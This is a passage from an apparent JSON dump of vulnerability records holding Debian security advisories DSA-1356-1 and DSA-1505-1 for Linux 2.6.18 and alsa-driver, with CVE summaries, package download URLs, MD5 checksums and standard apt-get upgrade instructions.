http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 50652 f19e0ad61b5e91f685e920a58248c8e9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 50698 111c11da4f26a93122b76b6eac5b92c8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 248366 7bafbd435e00ad6b647b347d84e1e0c1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 225218 90e19db35ef618a7e3f476576de60d95\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 248400 3dd8373a35220a27423c3f4eadd32358\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 248712 8a0281e9b856372f4d01c8a0f4b02d72\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 242934 92f3fda2938f60fdf6f957f0659712ab\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 3411216 b9070329bf0a6045896db2fc15f66f0a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 248448 e108e05b4fe2239d4e95fb6598405fd6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 249006 3908dfaf4f518192bd550ca5ac45476f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 16623606 b76fa67819092073c6bfc51904163278\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 15149270 502237df8e0f90e7ab95b28cbe7a5f8f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 16960668 69f13fe8bde671497363849f76636eda\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 18291108 9cc68d73b1bcf401176d1f93bd1dfeb1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 16395670 fbab6e355aba9c29f63603d097855c5e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 17006732 cca0573ca442e02ad6f153fcc059f734\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 18340518 3940b166f8b0464baa118c8557922edb\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 2939624 fada85c4d5ec9cbdee803116fde561b1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 50642 9478b247c93b2ba8b405f93b525307ae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-s390_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 50664 d694fdeff900e5b1ba575ad15bbd5310\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 139294 02bcbe57d1b62129243c8cb4b7bb8d2d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 139538 69993d0e2867ed4efa5bb0e442d3d014\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 2962698 36d89e72ac15117d15a3488878d205a4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 140274 5b8bacca256347a7ce02783651110e35\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 5398576 b1054f70f0472fd020241b6af904438d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390-tape_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 1435060 daf41750946017171aad603b9218d0c4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 5613112 68d67210c4c6aa0ea54b1754df137d8e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb\n Size/MD5 checksum: 5659570 c6a2db3553a427cecf69d9f1258e9444\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 3164578 902a8ff3089225278575251ba13f1f98\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 50640 455bd9863c6f183ee28d15e7ba9ddc38\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-sparc_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 50674 8416d5c20659923183729457854e139f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 161886 f58a554b0de7e05c4727bff1e236a069\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 191010 bad7bf07af89b1ba54ff559f99cf3d1b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 191776 f059b7c75ea312f69758d02e6da4cd4f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 3186936 2a865cc6aed95cdc0ed3ebb20ec0a6d0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 192172 197b2cd91975cbda876bc0ac18244870\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 6406184 e0ce977a5c79906c4996f069672e272b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 10351700 69bc68d296d9134f6df792fb745c9810\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 10610496 b40bc9a07de220a54a1489b22d1d60f4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\n Size/MD5 checksum: 10656362 91c6c66c24c7d5ca45c0e6eb5dcdcbba\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ etch/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/etch/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2007-08-16T00:00:00", "published": "2007-08-16T00:00:00", "id": "DEBIAN:DSA-1356-1:BF694", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00118.html", "title": "[SECURITY] [DSA 1356-1] New Linux 2.6.18 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-11-11T13:27:22", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4571"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1505 security@debian.org\nhttp://www.debian.org/security/ dann frazier\nFebruary 22, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : alsa-driver\nVulnerability : kernel memory leak\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2007-4571\n\nTakashi Iwai supplied a fix for a memory leak in the snd_page_alloc module.\nLocal users could exploit this issue to obtain sensitive information from\nthe kernel (CVE-2007-4571).\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 1.0.13-5etch1. This issue was already fixed for the version\nof ALSA provided by linux-2.6 in DSA 1479.\n\nFor the oldstable distribution (sarge), this problem has been fixed in\nversion 1.0.8-7sarge1. The prebuilt modules provided by alsa-modules-i386\nhave been rebuilt to take advantage of this update, and are available in\nversion 1.0.8+2sarge2.\n\nFor the unstable distributions (sid), this problem was fixed in version\n1.0.15-1.\n\nWe recommend that you upgrade your alsa-driver and alsa-modules-i386\npackages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nThe prebuilt modules update coincides with an ABI change in the 2.4.27\nkernel in oldstable (see DSA 1503). If you are using the prebuilt modules\nprovided by one of the alsa-modules-i386 packages, you will need to update\nyour kernel to the new ABI before you can use the updated version of that\npackage. For more information about Debian kernel ABI changes, see:\n http://wiki.debian.org/DebianKernelABIChanges\n\nAny modules manually built from the alsa-source package will need to be\nrebuilt against the updated alsa-source package to inherit this fix.\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-driver_1.0.8-7sarge1.dsc\n Size/MD5 checksum: 856 948be734bc12fb0ff08dfc1955d5e77d\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-driver_1.0.8-7sarge1.diff.gz\n Size/MD5 checksum: 150046 050e64b0872e80fb3151a4392d80dd08\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-driver_1.0.8.orig.tar.gz\n Size/MD5 checksum: 2493810 5d5e44e35ed109e2c293a20bd9d68489\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-i386_1.0.8+2sarge2.dsc\n Size/MD5 checksum: 1121 2e094a561912a0acf6cc5edf3f122ca8\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-i386_1.0.8+2sarge2.tar.gz\n Size/MD5 checksum: 5249 1604fe719636c98547f287653a7cf0a8\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-headers_1.0.8-7sarge1_all.deb\n Size/MD5 checksum: 13140 faa9b7ad33aeaa2dd7855616b9744a08\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-source_1.0.8-7sarge1_all.deb\n Size/MD5 checksum: 2003186 e5d0518e4fce125fe34a3fa22693e462\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-base_1.0.8-7sarge1_all.deb\n Size/MD5 checksum: 113854 7f369a8728e533884cd2ff081047f18a\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-386_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 1262528 ff0e8032f0ea8b5ea174c97a7dd20da7\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-686_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 1369022 2c141d44bb23f0ff23fc4051a064dbe9\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-386_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 4396 7329077b0171010fb61d5c3bc18eb306\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-k7-smp_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 1381190 874346a5f9bbce101ce1effbb10209aa\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-k7-smp_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 4478 172afe01c05d84d413c730f92265d985\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-686-smp_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 1412810 cc8bf0b6f778ca428dd1f2aa219898a7\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-686-smp_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 4500 afd217d917c37147ae61f304e250a6fa\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-686_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 4424 d3092f18e1ad781c7f31e25f101a21d8\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-k6_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 1273414 80b20a46c7db9db7f2529980ca0b428d\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-k7_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 4404 3b5b282a073c7c1bf0e00c6e97fb7828\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-k7_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 1341600 5dc6b283f17aa35cfc1ea2f4f00a5805\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-586tsc_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 1289658 01d76b0a6ab3ce4d46b313d176692686\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-586tsc_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 4416 fd54e30a86bf2c6995a4e805e6ffb340\n http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-k6_1.0.8+2sarge2_i386.deb\n Size/MD5 checksum: 4410 5d64373b3207881b0e5fe8736d4c3e00\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-driver_1.0.13-5etch1.diff.gz\n Size/MD5 checksum: 269718 b346005adcdc73426c37065eea9a2c25\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-driver_1.0.13.orig.tar.gz\n Size/MD5 checksum: 3047163 0d0a4bb89b8b47d6e1d267137c5c8ef8\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-driver_1.0.13-5etch1.dsc\n Size/MD5 checksum: 860 e82a3d193fbf5ac715abfbaaaea1b66f\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-source_1.0.13-5etch1_all.deb\n Size/MD5 checksum: 2543382 8b7ab44905f0650255d207bc2bcf9de6\n http://security.debian.org/pool/updates/main/a/alsa-driver/alsa-base_1.0.13-5etch1_all.deb\n Size/MD5 checksum: 172574 d1b52f2b757b7767548eade4e14c512a\n http://security.debian.org/pool/updates/main/a/alsa-driver/linux-sound-base_1.0.13-5etch1_all.deb\n Size/MD5 checksum: 28502 c223d863a84d44d783efdce31339728a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 7, "modified": "2008-02-22T22:11:46", "published": "2008-02-22T22:11:46", "id": "DEBIAN:DSA-1505-1:DAD99", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00069.html", "title": "[SECURITY] [DSA 1505-1] New alsa-driver packages fix kernel memory leak", "type": "debian", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-2172", "CVE-2007-2876", "CVE-2007-3848", "CVE-2007-1353", "CVE-2007-3851", "CVE-2007-3513", "CVE-2007-2453", "CVE-2007-3642", "CVE-2007-2525"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- --------------------------------------------------------------------------\r\nDebian Security Advisory DSA 1356-1 security@debian.org\r\nhttp://www.debian.org/security/ Dann Frazier\r\nAugust 15th, 2007 http://www.debian.org/security/faq\r\n- --------------------------------------------------------------------------\r\n\r\nPackage : linux-2.6\r\nVulnerability : several\r\nProblem-Type : local/remote\r\nDebian-specific: no\r\nCVE ID : CVE-2007-1353 CVE-2007-2172 CVE-2007-2453 CVE-2007-2525\r\n CVE-2007-2876 CVE-2007-3513 CVE-2007-3642 CVE-2007-3848\r\n CVE-2007-3851\r\n \r\nSeveral local and remote vulnerabilities have been discovered in the Linux\r\nkernel that may lead to a denial of service or the execution of arbitrary\r\ncode. The Common Vulnerabilities and Exposures project identifies the\r\nfollowing problems:\r\n\r\nCVE-2007-1353\r\n\r\n Ilja van Sprundel discovered that kernel memory could be leaked via the\r\n Bluetooth setsockopt call due to an uninitialized stack buffer. This\r\n could be used by local attackers to read the contents of sensitive kernel\r\n memory.\r\n\r\nCVE-2007-2172\r\n\r\n Thomas Graf reported a typo in the DECnet protocol handler that could\r\n be used by a local attacker to overrun an array via crafted packets,\r\n potentially resulting in a Denial of Service (system crash).\r\n A similar issue exists in the IPV4 protocol handler and will be fixed\r\n in a subsequent update.\r\n\r\nCVE-2007-2453\r\n\r\n A couple of issues with random number generation were discovered.\r\n Slightly less random numbers resulted from hashing a subset of the\r\n available entropy. zero-entropy systems were seeded with the same\r\n inputs at boot time, resulting in repeatable series of random numbers.\r\n\r\nCVE-2007-2525\r\n\r\n Florian Zumbiehl discovered a memory leak in the PPPOE subsystem caused\r\n by releasing a socket before PPPIOCGCHAN is called upon it. This could\r\n be used by a local user to DoS a system by consuming all available memory.\r\n\r\nCVE-2007-2876\r\n\r\n Vilmos Nebehaj discovered a NULL pointer dereference condition in the\r\n netfilter subsystem. This allows remote systems which communicate using\r\n the SCTP protocol to crash a system by creating a connection with an\r\n unknown chunk type.\r\n\r\nCVE-2007-3513\r\n\r\n Oliver Neukum reported an issue in the usblcd driver which, by not\r\n limiting the size of write buffers, permits local users with write access\r\n to trigger a DoS by consuming all available memory.\r\n\r\nCVE-2007-3642\r\n\r\n Zhongling Wen reported an issue in nf_conntrack_h323 where the lack of\r\n range checking may lead to NULL pointer dereferences. Remote attackers\r\n could exploit this to create a DoS condition (system crash).\r\n\r\nCVE-2007-3848\r\n\r\n Wojciech Purczynski discovered that pdeath_signal was not being reset\r\n properly under certain conditions which may allow local users to gain\r\n privileges by sending arbitrary signals to suid binaries.\r\n\r\nCVE-2007-3851\r\n \r\n Dave Airlie reported that Intel 965 and above chipsets have relocated\r\n their batch buffer security bits. Local X server users may exploit this\r\n to write user data to arbitrary physical memory addresses.\r\n\r\nThese problems have been fixed in the stable distribution in version \r\n2.6.18.dfsg.1-13etch1.\r\n\r\nThe following matrix lists additional packages that were rebuilt for\r\ncompatibility with or to take advantage of this update:\r\n\r\n Debian 4.0 (etch)\r\n fai-kernels 1.17+etch4\r\n user-mode-linux 2.6.18-1um-2etch3\r\n\r\nWe recommend that you upgrade your kernel package immediately and reboot\r\nthe machine. If you have built a custom kernel from the kernel source\r\npackage, you will need to rebuild to take advantage of these fixes.\r\n\r\nUpgrade Instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- --------------------------------\r\n\r\n Source archives:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.dsc\r\n Size/MD5 checksum: 5672 ef2648e54c6ea1769b29ba191fc13083\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.diff.gz\r\n Size/MD5 checksum: 5306139 589297d453d15848b5879cf22eed7d40\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\r\n Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\r\n\r\n Architecture independent components:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\r\n Size/MD5 checksum: 3585938 a94cd1247d3dc98378dd094b3b364044\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\r\n Size/MD5 checksum: 1081908 36d119bd92dbd35a8f83b191f74daf09\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\r\n Size/MD5 checksum: 1475708 0373ab2ac016f31d2591eab4de39e4d3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\r\n Size/MD5 checksum: 41417232 279c0d7b44a451169a118e0a2b0c4eeb\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-5_2.6.18.dfsg.1-13etch1_all.deb\r\n Size/MD5 checksum: 3738202 e4cfce3e67d3a0f6aeb4fe1fb5706372\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\r\n Size/MD5 checksum: 51094 b22167a8b2ab8d0cfb9eded0d0b8d8a0\r\n\r\n Alpha architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 3024210 ad1fc21ac8fcb76a0db86d25737c8a83\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 50680 28ad3748b8d76abbb2e896f7ff190240\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-alpha_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 50720 1f106b97c91e07921402b0a2174574c6\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 263524 4ce1e83ad733aee9d36b075babc6f908\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 263838 4c9ebe648f73818252ed3de79567219e\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 262864 a3d6389b9224fcef726128f3a747a4f8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 3048212 d86c3c8fac6533904b91592016e2afba\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 264300 15606dadab1e1bbb4d9234a8bfb09b5e\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 23485186 1978fddd39e8e7ce9ebc88efefd4ebe0\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 23464818 bdfd39761fd0bc68de001efb430895af\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 23838852 e9ae2b4f056d9b47832234d2aa6ec4d7\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb\r\n Size/MD5 checksum: 23528772 4f029181ad02c46f2ae2b34038b629e0\r\n\r\n AMD64 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 3164562 5bef24546e02e53d0b866b68e57c8294\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 50644 173c9d06298afe48e609cd08a5420737\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 50668 61e625ce94855d474c0562819ae3b879\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 270036 cd6f518453e0b75e3d4e17bc1fca62a3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 3187796 2958630378a24cb3f16807e04fe17297\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 269650 dbfd4c56547401e7b6a6460f41dd266b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 3330944 996a5cba350ae0c9110f8ca72492bfc2\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 271784 c1841e07342a73c9cf87058cc0ca943b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 3353796 730dd7dd17cb532152463000f16459f0\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 270068 363ff82948e473032eaa4fc37d2b9d6b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 16838550 dee2a96f0c89bc9b59b2febd42dc8bb1\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 1647400 8f72b372c132b40f5c828d7d0a94bf62\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\r\n Size/MD5 checksum: 1679728 853224dc22a8fa38c8b4af6534886a77\r\n 